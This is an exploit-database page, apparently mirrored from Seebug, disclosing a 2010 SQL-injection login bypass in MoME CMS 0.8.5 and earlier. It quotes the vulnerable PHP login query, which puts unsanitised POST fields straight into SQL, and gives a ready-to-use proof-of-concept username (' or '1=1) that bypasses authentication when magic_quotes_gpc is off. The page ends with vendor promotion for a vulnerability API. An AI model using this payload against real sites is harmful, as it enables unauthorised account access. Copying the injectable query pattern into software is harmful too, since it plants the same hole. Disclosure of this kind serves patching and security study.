Lucene search
K

MoME CMS <= 0.8.5 - Remote Login Bypass Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 18 Views

MoME CMS 0.8.5 Remote Login Bypass Exploit - 16.01.201

Code

                                                                            \#&#39;#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |    MoME CMS &#60;= 0.8.5 Remote Login Bypass Exploit   |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r &#60;cr4wl3r[!]linuxmail.org&#62;
[!] Download: http://sourceforge.net/projects/mome/files/
[!] Date: 16.01.2010
[!] Remote: yes


[!] Code :


//controllo user e passwd da login
 if(isset($_POST[&#39;posted_username&#39;]) && isset($_POST[&#39;posted_password&#39;])) {
        $query=&#34;SELECT * FROM users WHERE username=&#39;$_POST[posted_username]&#39; AND
password=md5(&#39;$_POST[posted_password]&#39;)&#34;;


[!] PoC:

    username : &#39; or &#39;1=1
    password : cr4wl3r
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation